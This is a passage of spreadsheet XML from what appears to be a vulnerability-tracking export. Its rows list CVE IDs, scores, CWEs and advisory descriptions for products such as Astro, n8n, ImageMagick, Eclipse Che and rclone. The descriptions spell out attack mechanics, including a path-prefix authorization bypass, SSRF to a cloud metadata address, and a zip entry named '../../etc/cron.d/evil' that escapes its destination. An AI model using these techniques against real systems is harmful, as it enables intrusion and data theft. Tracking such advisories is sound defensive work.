          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84376</t>
        </is>
      </c>
      <c r="C4258" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4258" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4258" s="5" t="inlineStr"/>
      <c r="F4258" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4258" s="5" t="inlineStr"/>
      <c r="H4258" s="5" t="inlineStr"/>
      <c r="I4258" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J4258" s="5" t="inlineStr"/>
      <c r="K4258" s="5" t="inlineStr">
        <is>
          <t>CWE-187</t>
        </is>
      </c>
      <c r="L4258" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. Prior to 7.2.4, Astro stripped a configured non-root base path from request pathnames using a string-prefix check without verifying a path-segment boundary. With base "/app", a request to "/appX/admin" resolved internally to the protected "/admin" route while middleware observed "/appX/admin" in context.url.pathname. In applications that authorize base-prefixed routes by inspecting context.url.pathname, an unauthenticated remote attacker could bypass pathname-based middleware authorization and reach protected routes. This issue is fixed in version 7.2.4.</t>
        </is>
      </c>
      <c r="M4258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84376</t>
        </is>
      </c>
    </row>
    <row r="4259">
      <c r="A4259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84942</t>
        </is>
      </c>
      <c r="C4259" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4259" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4259" s="5" t="inlineStr"/>
      <c r="F4259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4259" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4259" s="5" t="inlineStr"/>
      <c r="I4259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4259" s="5" t="inlineStr"/>
      <c r="K4259" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L4259" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in the Vega expression function implementation in OpenSearch Dashboards allows a remote authenticated actor with dashboard write permissions to execute arbitrary JavaScript in the context of other users' browser sessions by saving a crafted Vega visualization. The checkForFunctionProperty validation routine failed to recurse into arrays of objects, allowing a function property nested inside an array to bypass validation.</t>
        </is>
      </c>
      <c r="M4259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84942</t>
        </is>
      </c>
    </row>
    <row r="4260">
      <c r="A4260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84969</t>
        </is>
      </c>
      <c r="C4260" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4260" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4260" s="5" t="inlineStr"/>
      <c r="F4260" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4260" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H4260" s="5" t="inlineStr">
        <is>
          <t>mongodb:c_driver</t>
        </is>
      </c>
      <c r="I4260" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4260" s="5" t="inlineStr"/>
      <c r="K4260" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L4260" s="5" t="inlineStr">
        <is>
          <t>A memory-handling error in the BSON-to-JSON conversion helpers of the MongoDB C Driver can write a small number of bytes past the end of a heap buffer when a binary field is encoded and the output is cut short at a caller-configured length limit. A party who supplies the document content, with no privileges on the application that links the driver, may cause a small amount of data outside the intended buffer to be altered.</t>
        </is>
      </c>
      <c r="M4260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84969</t>
        </is>
      </c>
    </row>
    <row r="4261">
      <c r="A4261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85084</t>
        </is>
      </c>
      <c r="C4261" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4261" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4261" s="5" t="inlineStr"/>
      <c r="F4261" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4261" s="5" t="inlineStr"/>
      <c r="H4261" s="5" t="inlineStr"/>
      <c r="I4261" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4261" s="5" t="inlineStr"/>
      <c r="K4261" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="L4261" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds Write and Improper Validation of Array Index vulnerability in Samsung Open Source TizenFX Samsung/TizenFX allows Overflow Buffers.</t>
        </is>
      </c>
      <c r="M4261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85084</t>
        </is>
      </c>
    </row>
    <row r="4262">
      <c r="A4262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85167</t>
        </is>
      </c>
      <c r="C4262" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4262" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4262" s="5" t="inlineStr"/>
      <c r="F4262" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4262" s="5" t="inlineStr">
        <is>
          <t>elasticsearch</t>
        </is>
      </c>
      <c r="H4262" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="I4262" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4262" s="5" t="inlineStr"/>
      <c r="K4262" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L4262" s="5" t="inlineStr">
        <is>
          <t>n8n before 2.35.4 and 2.36.x before 2.36.2 contain a query injection vulnerability in the Elasticsearch Document Get All and Google Cloud Firestore Document Query operations, which build their JSON query by interpolating expression values directly into the query string before parsing. A value containing quote and brace characters can close the intended field and introduce new query operators, turning an intended single-document lookup into a full-collection read.</t>
        </is>
      </c>
      <c r="M4262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85167</t>
        </is>
      </c>
    </row>
    <row r="4263">
      <c r="A4263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85592</t>
        </is>
      </c>
      <c r="C4263" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4263" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4263" s="5" t="inlineStr"/>
      <c r="F4263" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4263" s="5" t="inlineStr"/>
      <c r="H4263" s="5" t="inlineStr"/>
      <c r="I4263" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4263" s="5" t="inlineStr"/>
      <c r="K4263" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4263" s="5" t="inlineStr">
        <is>
          <t>phpMyFAQ before 4.1.8 contains an authorization bypass vulnerability in the question creation endpoint where the isAddingQuestionsAllowed() method grants access to all callers when main.enableAskQuestions is enabled, ignoring the records.allowQuestionsForGuests setting. Unauthenticated attackers can submit questions via the question/create API endpoint to bypass guest submission restrictions and inject spam into the admin moderation queue.</t>
        </is>
      </c>
      <c r="M4263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85592</t>
        </is>
      </c>
    </row>
    <row r="4264">
      <c r="A4264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85640</t>
        </is>
      </c>
      <c r="C4264" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4264" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4264" s="5" t="inlineStr"/>
      <c r="F4264" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4264" s="5" t="inlineStr"/>
      <c r="H4264" s="5" t="inlineStr"/>
      <c r="I4264" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4264" s="5" t="inlineStr"/>
      <c r="K4264" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L4264" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine Endpoint Central versions below 11.5.2600.15 are vulnerable to Privilege Escalation Due to Outdated Component</t>
        </is>
      </c>
      <c r="M4264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85640</t>
        </is>
      </c>
    </row>
    <row r="4265">
      <c r="A4265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86077</t>
        </is>
      </c>
      <c r="C4265" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4265" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4265" s="5" t="inlineStr"/>
      <c r="F4265" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4265" s="5" t="inlineStr"/>
      <c r="H4265" s="5" t="inlineStr"/>
      <c r="I4265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4265" s="5" t="inlineStr"/>
      <c r="K4265" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L4265" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the /chat WebSocket route accepted a resumeToken and resumed a paused execution without checking that the target node supported chat messages. An anonymous form submitter who received that token could reuse it on the chat route to release a Send-and-Wait, non-chat HITL, or Wait approval gate. The affected authorization logic is packages/cli/src/chat/chat-execution-manager.ts, where canResumeOverChat did not gate the resume target. This issue is fixed in versions 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M4265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86077</t>
        </is>
      </c>
    </row>
    <row r="4266">
      <c r="A4266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86079</t>
        </is>
      </c>
      <c r="C4266" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4266" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4266" s="5" t="inlineStr"/>
      <c r="F4266" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4266" s="5" t="inlineStr">
        <is>
          <t>elasticsearch</t>
        </is>
      </c>
      <c r="H4266" s="5" t="inlineStr"/>
      <c r="I4266" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4266" s="5" t="inlineStr"/>
      <c r="K4266" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4266" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the Elasticsearch and ElasticSecurity nodes interpolated workflow-controlled index and document identifiers directly into REST request paths. An identifier containing path separators or dot segments could select another index or a cluster administration endpoint under the stored Elasticsearch credential. The affected request construction includes packages/nodes-base/nodes/Elastic/Elasticsearch/GenericFunctions.ts and the missing toPathSegment encoding. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M4266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86079</t>
        </is>
      </c>
    </row>
    <row r="4267">
      <c r="A4267" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86080</t>
        </is>
      </c>
      <c r="C4267" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4267" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4267" s="5" t="inlineStr"/>
      <c r="F4267" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4267" s="5" t="inlineStr"/>
      <c r="H4267" s="5" t="inlineStr"/>
      <c r="I4267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4267" s="5" t="inlineStr"/>
      <c r="K4267" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L4267" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the GitHub Trigger generated a webhook secret but discarded it when GitHub returned HTTP 422 and the node reused an existing webhook. Workflow static data then retained webhookId without webhookSecret, and X-Hub-Signature-256 verification accepted deliveries without a stored secret. The affected logic includes packages/nodes-base/nodes/Github/GithubTriggerHelpers.ts and the 422 webhook reuse path. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M4267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86080</t>
        </is>
      </c>
    </row>
    <row r="4268">
      <c r="A4268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86186</t>
        </is>
      </c>
      <c r="C4268" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4268" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4268" s="5" t="inlineStr"/>
      <c r="F4268" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4268" s="5" t="inlineStr"/>
      <c r="H4268" s="5" t="inlineStr"/>
      <c r="I4268" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4268" s="5" t="inlineStr"/>
      <c r="K4268" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L4268" s="5" t="inlineStr">
        <is>
          <t>AVideo API fails to enforce rate limits when clients send a bot User-Agent header, allowing attackers to bypass all eight protected operations including login brute-force protection. Attackers can send requests with a bot User-Agent to disable rate limiting and perform unlimited password guessing attempts against any account from a single IP address.</t>
        </is>
      </c>
      <c r="M4268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86186</t>
        </is>
      </c>
    </row>
    <row r="4269">
      <c r="A4269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86203</t>
        </is>
      </c>
      <c r="C4269" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4269" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4269" s="5" t="inlineStr"/>
      <c r="F4269" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4269" s="5" t="inlineStr"/>
      <c r="H4269" s="5" t="inlineStr"/>
      <c r="I4269" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4269" s="5" t="inlineStr"/>
      <c r="K4269" s="5" t="inlineStr">
        <is>
          <t>CWE-664</t>
        </is>
      </c>
      <c r="L4269" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.39.2 fail to validate entity despawn state when processing attack packets from clients. Attackers can exploit a race condition by attacking a disconnecting player to trigger multiple death handlers, causing inventory items and experience to drop multiple times for duplication.</t>
        </is>
      </c>
      <c r="M4269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86203</t>
        </is>
      </c>
    </row>
    <row r="4270">
      <c r="A4270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86420</t>
        </is>
      </c>
      <c r="C4270" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4270" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4270" s="5" t="inlineStr"/>
      <c r="F4270" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4270" s="5" t="inlineStr"/>
      <c r="H4270" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="I4270" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4270" s="5" t="inlineStr"/>
      <c r="K4270" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L4270" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 and 6.9.13-55 fails to properly lower the memory budget when an operation inside OpenPixelCache fails. Repeated triggering of such failures can exhaust the process memory budget and result in a denial of service.</t>
        </is>
      </c>
      <c r="M4270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86420</t>
        </is>
      </c>
    </row>
    <row r="4271">
      <c r="A4271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86421</t>
        </is>
      </c>
      <c r="C4271" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4271" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4271" s="5" t="inlineStr"/>
      <c r="F4271" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4271" s="5" t="inlineStr"/>
      <c r="H4271" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="I4271" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4271" s="5" t="inlineStr"/>
      <c r="K4271" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L4271" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 and 6.9.13-55 contains a memory leak in the MSL image decoder. A crafted MSL image triggers memory allocation without proper deallocation, allowing an attacker to exhaust memory and cause a denial of service.</t>
        </is>
      </c>
      <c r="M4271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86421</t>
        </is>
      </c>
    </row>
    <row r="4272">
      <c r="A4272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86590</t>
        </is>
      </c>
      <c r="C4272" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4272" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4272" s="5" t="inlineStr"/>
      <c r="F4272" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4272" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H4272" s="5" t="inlineStr"/>
      <c r="I4272" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4272" s="5" t="inlineStr"/>
      <c r="K4272" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L4272" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Che versions 7.79.0 through 7.121.0, the dashboard backend's POST /dashboard/api/data/resolver endpoint passes a caller-supplied URL directly to an outbound HTTP GET request with no host filtering. An authenticated user can exploit this server-side request forgery (SSRF) to read responses from internal network addresses, including the cloud instance metadata service (169.254.169.254), loopback interfaces, RFC-1918 private ranges, and in-cluster Kubernetes services. The operator-configured allowlist (spec.devEnvironments.allowedSources.urls) is not consulted. The vulnerability is fixed in version 7.122.0, which adds private-address blocking, IPv4-mapped IPv6 bypass prevention, operator allowlist enforcement, and disables HTTP redirects on the outbound request.</t>
        </is>
      </c>
      <c r="M4272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86590</t>
        </is>
      </c>
    </row>
    <row r="4273">
      <c r="A4273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87047</t>
        </is>
      </c>
      <c r="C4273" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4273" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4273" s="5" t="inlineStr"/>
      <c r="F4273" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4273" s="5" t="inlineStr"/>
      <c r="H4273" s="5" t="inlineStr"/>
      <c r="I4273" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4273" s="5" t="inlineStr"/>
      <c r="K4273" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4273" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M4273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87047</t>
        </is>
      </c>
    </row>
    <row r="4274">
      <c r="A4274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88014</t>
        </is>
      </c>
      <c r="C4274" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4274" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4274" s="5" t="inlineStr"/>
      <c r="F4274" s="5" t="inlineStr"/>
      <c r="G4274" s="5" t="inlineStr"/>
      <c r="H4274" s="5" t="inlineStr"/>
      <c r="I4274" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4274" s="5" t="inlineStr"/>
      <c r="K4274" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L4274" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. From 1.72.0 until 1.75.1, the archive ZIP backend method (*Fs).readZip in backend/archive/zip/zip.go accepts archive/zip.File.Name values from an untrusted central directory and exposes cleaned entry names without ensuring that they remain inside the archive namespace. Entries such as ../../etc/cron.d/evil can survive path.Clean and become Object.Remote() values that fs/sync and fs/operations use as destination-relative paths, allowing rclone copy or sync to write outside the selected destination on backends that do not independently confine the path. The non-empty root check also used strings.HasPrefix without a path boundary, so root foo could incorrectly include sibling foobar entries. This issue is fixed in version 1.75.1.</t>
        </is>
      </c>
      <c r="M4274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88014</t>
        </is>
      </c>
    </row>
    <row r="4275">
      <c r="A4275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88859</t>
        </is>
      </c>
      <c r="C4275" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4275" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4275" s="5" t="inlineStr"/>
      <c r="F4275" s="5" t="inlineStr"/>
      <c r="G4275" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4275" s="5" t="inlineStr"/>
      <c r="I4275" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4275" s="5" t="inlineStr"/>
      <c r="K4275" s="5" t="inlineStr">
        <is>
          <t>CWE-84</t>
        </is>
      </c>
      <c r="L4275" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Evolution. A remote attacker can exploit this vulnerability by sending a specially crafted HTML email containing a spoofed vCard control. When a victim clicks on this control, Evolution's trusted JavaScript handler incorrectly assigns an attacker-controlled JavaScript URL to an iframe's source. This action leads to arbitrary JavaScript execution within the mail-viewing context, effectively bypassing the security measures designed to prevent script execution in email content.</t>
        </is>
      </c>
      <c r="M4275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88859</t>
        </is>
      </c>
    </row>
    <row r="4276">
      <c r="A4276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9327</t>
        </is>
      </c>
      <c r="C4276" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="D4276" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4276" s="5" t="inlineStr"/>
      <c r="F4276" s="5" t="inlineStr"/>
      <c r="G4276" s="5" t="inlineStr">
        <is>
          <t>ibm, websphere</t>
        </is>
      </c>
      <c r="H4276" s="5" t="inlineStr"/>
      <c r="I4276" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J4276" s="5" t="inlineStr"/>
      <c r="K4276" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L4276" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 could allow an authenticated user with a low-privilege administrative role to modify security configuration. This could result in information disclosure or denial of service.</t>
        </is>
      </c>
      <c r="M4276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9327</t>
        </is>
      </c>
    </row>
    <row r="4277">
      <c r="A4277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18874</t>
        </is>
      </c>
      <c r="C4277" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4277" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4277" s="5" t="inlineStr"/>
      <c r="F4277" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G4277" s="5" t="inlineStr"/>
      <c r="H4277" s="5" t="inlineStr"/>
      <c r="I4277" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J4277" s="5" t="inlineStr"/>
      <c r="K4277" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L4277" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in volsync-addon-controller. This vulnerability allows an attacker to inject malicious YAML (Yet Another Markup Language) code into the OpenShift Lifecycle Manager (OLM) Subscription resource. This is due to improper escaping of annotation values when they are rendered into YAML. Successful exploitation could lead to unauthorized modification or control over OLM Subscription configurations, potentially impacting software management within the cluster. This issue primarily affects systems where the 'volsync-addon-deploy-type: olm' annotation is explicitly enabled.</t>
        </is>
      </c>
      <c r="M4277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18874</t>
        </is>
      </c>
    </row>
    <row r="4278">
      <c r="A4278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19795</t>
        </is>
      </c>
      <c r="C4278" s="5" t="n">
        <v>6.2</v>
      </c>
      <c r="D4278" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4278" s="5" t="inlineStr"/>
      <c r="F4278" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4278" s="5" t="inlineStr"/>
      <c r="H4278" s="5" t="inlineStr"/>
      <c r="I4278" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4278" s="5" t="inlineStr"/>
      <c r="K4278" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L4278" s="5" t="inlineStr">
        <is>
          <t>Qiskit could allow a local attacker to cause a denial of service due to a stack overflow during deserialization of QPY payloads. A malicious QPY payload can trigger a segmentation fault, causing the application to crash when deserializing untrusted input.</t>
        </is>
      </c>
      <c r="M4278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19795</t>
        </is>
      </c>
    </row>
    <row r="4279">
      <c r="A4279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
